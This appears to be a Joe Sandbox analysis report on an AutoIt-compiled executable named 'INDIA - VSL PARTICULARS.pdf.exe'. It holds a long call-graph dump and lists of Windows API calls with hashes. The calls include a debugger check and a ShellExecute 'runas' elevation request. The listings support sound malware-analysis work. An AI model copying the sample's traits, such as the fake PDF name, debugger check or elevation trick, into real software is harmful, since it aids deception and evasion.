87573->87572 87574->87083 87575->87089 87576->87089 87582 45272f __tzset_nolock _wcscpy 87577->87582 87578 414d04 61 API calls __fread_nolock 87578->87582 87579 44afef GetSystemTimeAsFileTime 87579->87582 87580 4528a4 87580->86998 87580->86999 87581 4150d1 81 API calls _fseek 87581->87582 87582->87578 87582->87579 87582->87580 87582->87581 87584 44b1bc 87583->87584 87585 44b1ca 87583->87585 87586 4149c2 116 API calls 87584->87586 87587 44b1e1 87585->87587 87588 4149c2 116 API calls 87585->87588 87589 44b1d8 87585->87589 87586->87585 87618 4321a4 87587->87618 87590 44b2db 87588->87590 87589->87025 87590->87587 87592 44b2e9 87590->87592 87594 44b2f6 87592->87594 87597 414a46 __fcloseall 82 API calls 87592->87597 87593 44b224 87595 44b253 87593->87595 87596 44b228 87593->87596 87594->87025 87622 43213d 87595->87622 87599 44b235 87596->87599 87600 414a46 __fcloseall 82 API calls 87596->87600 87597->87594 87601 44b245 87599->87601 87603 414a46 __fcloseall 82 API calls 87599->87603 87600->87599 87601->87025 87602 44b25a 87604 44b260 87602->87604 87605 44b289 87602->87605 87603->87601 87607 44b26d 87604->87607 87609 414a46 __fcloseall 82 API calls 87604->87609 87632 44b0bf 87 API calls 87605->87632 87610 44b27d 87607->87610 87611 414a46 __fcloseall 82 API calls 87607->87611 87608 44b28f 87633 4320f8 46 API calls _free 87608->87633 87609->87607 87610->87025 87611->87610 87613 44b295 87614 414a46 __fcloseall 82 API calls 87613->87614 87616 44b2a2 87613->87616 87614->87616 87615 44b2b2 87615->87025 87616->87615 87617 414a46 __fcloseall 82 API calls 87616->87617 87617->87615 87619 4321cb 87618->87619 87621 4321b4 __tzset_nolock _memmove 87618->87621 87620 414d04 __fread_nolock 61 API calls 87619->87620 87620->87621 87621->87593 87623 4135bb _malloc 46 API calls 87622->87623 87624 432150 87623->87624 87625 4135bb _malloc 46 API calls 87624->87625 87626 432162 87625->87626 87627 4135bb _malloc 46 API calls 87626->87627 87628 432174 87627->87628 87630 432189 87628->87630 87634 
4320f8 46 API calls _free 87628->87634 87630->87602 87631 432198 87631->87602 87632->87608 87633->87613 87634->87631 87635->86928 87636->86930 87637->86948 87638->86948 87639->86948 87640->86941 87641->86948 87642->86948 87643->86953 87644->86963 87645->86961 87646->86961 87696 410160 87647->87696 87649 41012f GetFullPathNameW 87650 410147 ctype 87649->87650 87650->86784 87652 4102cb SHGetDesktopFolder 87651->87652 87655 410333 _wcsncpy 87651->87655 87653 4102e0 _wcsncpy 87652->87653 87652->87655 87654 41031c SHGetPathFromIDListW 87653->87654 87653->87655 87654->87655 87655->86787 87657 4101bb 87656->87657 87662 425f4a 87656->87662 87658 410160 52 API calls 87657->87658 87659 4101c7 87658->87659 87700 410200 52 API calls 2 library calls 87659->87700 87660 4114ab __wcsicoll 58 API calls 87660->87662 87662->87660 87664 425f6e 87662->87664 87663 4101d6 87701 410200 52 API calls 2 library calls 87663->87701 87664->86789 87666 4101e9 87666->86789 87668 40f760 128 API calls 87667->87668 87669 40f584 87668->87669 87670 429335 87669->87670 87671 40f58c 87669->87671 87674 4528bd 118 API calls 87670->87674 87672 40f598 87671->87672 87673 429358 87671->87673 87726 4033c0 113 API calls 7 library calls 87672->87726 87727 434034 86 API calls _wprintf 87673->87727 87677 42934b 87674->87677 87680 429373 87677->87680 87681 42934f 87677->87681 87678 429369 87678->87680 87679 40f5b4 87679->86785 87682 4115d7 52 API calls 87680->87682 87683 431e58 82 API calls 87681->87683 87684 4293c5 ctype 87682->87684 87683->87673 87685 42959c 87684->87685 87693 401b10 52 API calls 87684->87693 87702 444af8 87684->87702 87705 44b41c 87684->87705 87712 402780 87684->87712 87720 4022d0 87684->87720 87728 44c7dd 64 API calls 3 library calls 87684->87728 87686 413748 _free 46 API calls 87685->87686 87687 4295a5 87686->87687 87688 431e58 82 API calls 87687->87688 87689 4295b1 87688->87689 87693->87684 87697 410167 _wcslen 87696->87697 87698 4115d7 52 API calls 87697->87698 87699 41017e _wcscpy 
87698->87699 87699->87649 87700->87663 87701->87666 87703 4115d7 52 API calls 87702->87703 87704 444b27 _memmove 87703->87704 87704->87684 87706 44b429 87705->87706 87707 4115d7 52 API calls 87706->87707 87708 44b440 87707->87708 87709 44b45e 87708->87709 87710 401b10 52 API calls 87708->87710 87709->87684 87711 44b453 87710->87711 87711->87684 87713 402790 ctype _memmove 87712->87713 87714 402827 87712->87714 87715 4115d7 52 API calls 87713->87715 87716 4115d7 52 API calls 87714->87716 87717 402797 87715->87717 87716->87713 87718 4115d7 52 API calls 87717->87718 87719 4027bd 87717->87719 87718->87719 87719->87684 87721 4022e0 87720->87721 87723 40239d 87720->87723 87722 4115d7 52 API calls 87721->87722 87721->87723 87724 402320 ctype 87721->87724 87722->87724 87723->87684 87724->87723 87725 4115d7 52 API calls 87724->87725 87725->87724 87726->87679 87727->87678 87728->87684 87730 402417 87729->87730 87734 402539 ctype 87729->87734 87731 4115d7 52 API calls 87730->87731 87730->87734 87732 402443 87731->87732 87733 4115d7 52 API calls 87732->87733 87736 4024b4 87733->87736 87734->86793 87736->87734 87737 4022d0 52 API calls 87736->87737 87758 402880 95 API calls 2 library calls 87736->87758 87737->87736 87743 401566 87738->87743 87739 401794 87759 40e9a0 90 API calls 87739->87759 87742 40167a 87745 4017c0 87742->87745 87760 45e737 90 API calls 3 library calls 87742->87760 87743->87739 87743->87742 87744 4010a0 52 API calls 87743->87744 87744->87743 87745->86795 87747 40bc70 52 API calls 87746->87747 87756 40d451 87747->87756 87748 40d50f 87763 410600 52 API calls 87748->87763 87750 427c01 87764 45e737 90 API calls 3 library calls 87750->87764 87751 40e0a0 52 API calls 87751->87756 87753 401b10 52 API calls 87753->87756 87754 40d519 87754->86798 87756->87748 87756->87750 87756->87751 87756->87753 87756->87754 87761 40f310 53 API calls 87756->87761 87762 40d860 91 API calls 87756->87762 87758->87736 87759->87742 87760->87745 87761->87756 87762->87756 87763->87754 
87764->87754 87765->86811 87766->86812 87768 42c5fe 87767->87768 87783 4091c6 87767->87783 87769 40bc70 52 API calls 87768->87769 87768->87783 87770 42c64e InterlockedIncrement 87769->87770 87771 42c665 87770->87771 87776 42c697 87770->87776 87773 42c672 InterlockedDecrement Sleep InterlockedIncrement 87771->87773 87771->87776 87772 42c737 InterlockedDecrement 87774 42c74a 87772->87774 87773->87771 87773->87776 87777 408f40 VariantClear 87774->87777 87775 42c731 87775->87772 87776->87772 87776->87775 88060 408e80 87776->88060 87779 42c752 87777->87779 88069 410c60 VariantClear ctype 87779->88069 87783->86874 87784 42c6db 87785 402160 52 API calls 87784->87785 87786 42c6e5 87785->87786 88065 45340c 85 API calls 87786->88065 87788 42c6f1 88066 40d200 52 API calls 2 library calls 87788->88066 87790 42c6fb 88067 465124 53 API calls 87790->88067 87792 42c715 87793 42c76a 87792->87793 87794 42c719 87792->87794 87795 401b10 52 API calls 87793->87795 88068 46fe32 VariantClear 87794->88068 87797 42c77e 87795->87797 87798 401980 53 API calls 87797->87798 87804 42c796 87798->87804 87799 42c812 88071 46fe32 VariantClear 87799->88071 87801 42c82a InterlockedDecrement 88072 46ff07 54 API calls 87801->88072 87803 42c864 88073 45e737 90 API calls 3 library calls 87803->88073 87804->87799 87804->87803 88070 40ba10 52 API calls 2 library calls 87804->88070 87806 42c9ec 88116 47d33e 329 API calls 87806->88116 87809 42c9fe 88117 46feb1 VariantClear VariantClear 87809->88117 87811 408f40 VariantClear 87821 42c849 87811->87821 87812 42ca08 87813 401b10 52 API calls 87812->87813 87816 42ca15 87813->87816 87814 408f40 VariantClear 87817 42c891 87814->87817 87815 402780 52 API calls 87815->87821 88074 410c60 VariantClear ctype 87817->88074 87820 401980 53 API calls 87820->87821 87821->87806 87821->87811 87821->87815 87821->87820 88075 40a780 87821->88075 87822 42c874 87822->87814 87824 42ca59 87822->87824 87824->87824 87826 40afc4 87825->87826 87827 40b156 87825->87827 87828 40afd5 
87826->87828 87829 42d1e3 87826->87829 88127 45e737 90 API calls 3 library calls 87827->88127 87833 40a780 192 API calls 87828->87833 87847 40b11a ctype 87828->87847 88128 45e737 90 API calls 3 library calls 87829->88128 87832 40b143 87832->86874 87835 40b00a 87833->87835 87834 42d1f8 87838 408f40 VariantClear 87834->87838 87835->87834 87839 40b012 87835->87839 87837 42d4db 87837->87837 87838->87832 87840 42d231 VariantClear 87839->87840 87842 40b04a 87839->87842 87848 40b094 ctype 87839->87848 87849 40b05c ctype 87840->87849 87841 40b108 87841->87847 88130 40e270 VariantClear ctype 87841->88130 87842->87849 88129 40e270 VariantClear ctype 87842->88129 87843 42d45a VariantClear 87843->87847 87846 4115d7 52 API calls 87846->87848 87847->87832 88131 45e737 90 API calls 3 library calls 87847->88131 87848->87841 87850 42d425 ctype 87848->87850 87849->87846 87849->87848 87850->87843 87850->87847 87852 408fff 87851->87852 87855 40900d 87851->87855 88132 403ea0 52 API calls __cinit 87852->88132 87856 42c3f6 87855->87856 87858 40a780 192 API calls 87855->87858 87859 42c44a 87855->87859 87861 42c47b 87855->87861 87863 42c4cb 87855->87863 87864 42c564 87855->87864 87867 42c548 87855->87867 87871 409112 87855->87871 87873 42c528 87855->87873 87875 4090df 87855->87875 87879 4090ea 87855->87879 87885 4090f2 ctype 87855->87885 88134 4534e3 52 API calls 87855->88134 88136 40c4e0 192 API calls 87855->88136 88135 45e737 90 API calls 3 library calls 87856->88135 87858->87855 88137 45e737 90 API calls 3 library calls 87859->88137 88138 451b42 61 API calls 87861->88138 88140 47faae 231 API calls 87863->88140 87868 408f40 VariantClear 87864->87868 88143 45e737 90 API calls 3 library calls 87867->88143 87868->87885 87869 42c491 87869->87885 88139 45e737 90 API calls 3 library calls 87869->88139 87870 42c4da 87870->87885 88141 45e737 90 API calls 3 library calls 87870->88141 87871->87867 87877 40912b 87871->87877 88142 45e737 90 API calls 3 library calls 87873->88142 87875->87879 87880 
408e80 VariantClear 87875->87880 87877->87885 88133 403e10 53 API calls 87877->88133 87881 408f40 VariantClear 87879->87881 87880->87879 87881->87885 87883 40914b 87884 408f40 VariantClear 87883->87884 87884->87885 87885->86874 88144 408d90 87886->88144 87888 408cf9 87889 429778 87888->87889 87892 42976c 87888->87892 87894 408d2d 87888->87894 88171 410c60 VariantClear ctype 87889->88171 87891 429780 88170 45e737 90 API calls 3 library calls 87892->88170 88160 403d10 87894->88160 87897 408d71 ctype 87897->86874 87898 408f40 VariantClear 87899 408d45 ctype 87898->87899 87899->87897 87899->87898 87901 425c87 87900->87901 87902 40d15f 87900->87902 87903 425cc7 87901->87903 87904 425ca1 TranslateAcceleratorW 87901->87904 87902->86874 87904->87902 87906 42602f 87905->87906 87909 40d17f 87905->87909 87906->86874 87907 42608e IsDialogMessageW 87908 40d18c 87907->87908 87907->87909 87908->86874 87909->87907 87909->87908 88467 430c46 GetClassLongW 87909->88467 87912 4096c6 _wcslen 87911->87912 87913 40a70c ctype _memmove 87912->87913 87914 4115d7 52 API calls 87912->87914 87917 4013a0 52 API calls 87913->87917 87915 4096fa _memmove 87914->87915 87916 4115d7 52 API calls 87915->87916 87918 40971b 87916->87918 87919 4297aa 87917->87919 87918->87913 87920 409749 CharUpperBuffW 87918->87920 87924 40976a ctype 87918->87924 87921 4115d7 52 API calls 87919->87921 87920->87924 87922 4297d1 _memmove 87921->87922 88495 45e737 90 API calls 3 library calls 87922->88495 87972 4097e5 ctype 87924->87972 88469 47dcbb 194 API calls 87924->88469 87926 42a452 87927 408f40 VariantClear 87926->87927 87928 42ae92 87927->87928 88496 410c60 VariantClear ctype 87928->88496 87930 42aea4 87931 409aa2 87931->87922 87933 4115d7 52 API calls 87931->87933 87938 409afe 87931->87938 87932 40a689 87935 4115d7 52 API calls 87932->87935 87933->87938 87934 4115d7 52 API calls 87934->87972 87951 40a6af ctype _memmove 87935->87951 87936 409b2a 87940 429dbe 87936->87940 88004 409b4d ctype _memmove 87936->88004 
88477 40b400 VariantClear VariantClear ctype 87936->88477 87937 40c2c0 52 API calls 87937->87972 87938->87936 87939 4115d7 52 API calls 87938->87939 87941 429d31 87939->87941 87946 429dd3 87940->87946 88478 40b400 VariantClear VariantClear ctype 87940->88478 87945 429d42 87941->87945 88474 44a801 52 API calls 87941->88474 87942 429a46 VariantClear 87942->87972 87943 409fd2 87949 40a045 87943->87949 87998 42a3f5 87943->87998 87955 40e0a0 52 API calls 87945->87955 87946->88004 88479 40e1c0 VariantClear ctype 87946->88479 87953 4115d7 52 API calls 87949->87953 87950 408f40 VariantClear 87950->87972 87958 4115d7 52 API calls 87951->87958 87959 40a04c 87953->87959 87960 429d57 87955->87960 87958->87913 87963 40a0a7 87959->87963 87966 4091e0 315 API calls 87959->87966 88475 453443 52 API calls 87960->88475 87962 42a42f 88483 45e737 90 API calls 3 library calls 87962->88483 87983 40a0af 87963->87983 88484 40c790 VariantClear ctype 87963->88484 87964 4299d9 87968 408f40 VariantClear 87964->87968 87966->87963 87967 429abd 87967->86874 87973 4299e2 87968->87973 87969 429d88 88476 453443 52 API calls 87969->88476 87972->87922 87972->87926 87972->87931 87972->87932 87972->87934 87972->87937 87972->87942 87972->87950 87972->87951 87972->87964 87972->87967 87977 40a780 192 API calls 87972->87977 88470 40c4e0 192 API calls 87972->88470 88472 40ba10 52 API calls 2 library calls 87972->88472 88473 40e270 VariantClear ctype 87972->88473 88471 410c60 VariantClear ctype 87973->88471 87977->87972 87978 402780 52 API calls 87978->88004 87980 408f40 VariantClear 88012 40a162 ctype _memmove 87980->88012 87981 4115d7 52 API calls 87981->88004 87982 41130a 51 API calls __cinit 87982->88004 87984 40a11b 87983->87984 87986 42a4b4 VariantClear 87983->87986 87983->88012 87991 40a12d ctype 87984->87991 88485 40e270 VariantClear ctype 87984->88485 87985 40a780 192 API calls 87985->88004 87986->87991 87988 401980 53 API calls 87988->88004 87989 408e80 VariantClear 87989->88004 87990 4115d7 52 API 
                              APIs
                              • _wcslen.LIBCMT ref: 004096C1
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 0040970C
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                              • _memmove.LIBCMT ref: 00409D96
                              • _memmove.LIBCMT ref: 0040A6C4
                              • _memmove.LIBCMT ref: 004297E5
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                              • String ID:
                              • API String ID: 2383988440-0
                              • Opcode ID: a06cd1955fce2694f18b8147bf75f67824b193f3afcae0e29f98764ad8f97a23
                              • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                              • Opcode Fuzzy Hash: a06cd1955fce2694f18b8147bf75f67824b193f3afcae0e29f98764ad8f97a23
                              • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                              Control-flow Graph

                              APIs
                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                              • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                              • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                              • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                              • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                              • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                              • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                              • String ID: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                              • API String ID: 2495805114-2143918303
                              • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                              • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                              • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                              Control-flow Graph

                              APIs
                              • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                              • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                              • FreeLibrary.KERNEL32(?), ref: 0040E642
                              • FreeLibrary.KERNEL32(?), ref: 0040E654
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                              • String ID: 0SH$#v
                              • API String ID: 3363477735-2448020801
                              • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                              • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                              • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                              APIs
                              • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                              • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: IsThemeActive$uxtheme.dll
                              • API String ID: 2574300362-3542929980
                              • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                              • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                              • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                              APIs
                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                              • FreeLibrary.KERNEL32(?), ref: 0040D78E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FreeInfoLibraryParametersSystem
                              • String ID: #v
                              • API String ID: 3403648963-554117064
                              • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                              • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                              • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                              • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                              • TranslateMessage.USER32(?), ref: 00409556
                              • DispatchMessageW.USER32(?), ref: 00409561
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchSleepTranslate
                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                              • API String ID: 1762048999-758534266
                              • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                              • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                              • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                              • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,00000104,?), ref: 00401F4C
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • __wcsicoll.LIBCMT ref: 00402007
                              • __wcsicoll.LIBCMT ref: 0040201D
                              • __wcsicoll.LIBCMT ref: 00402033
                                • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                              • __wcsicoll.LIBCMT ref: 00402049
                              • _wcscpy.LIBCMT ref: 0040207C
                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe,00000104), ref: 00428B5B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
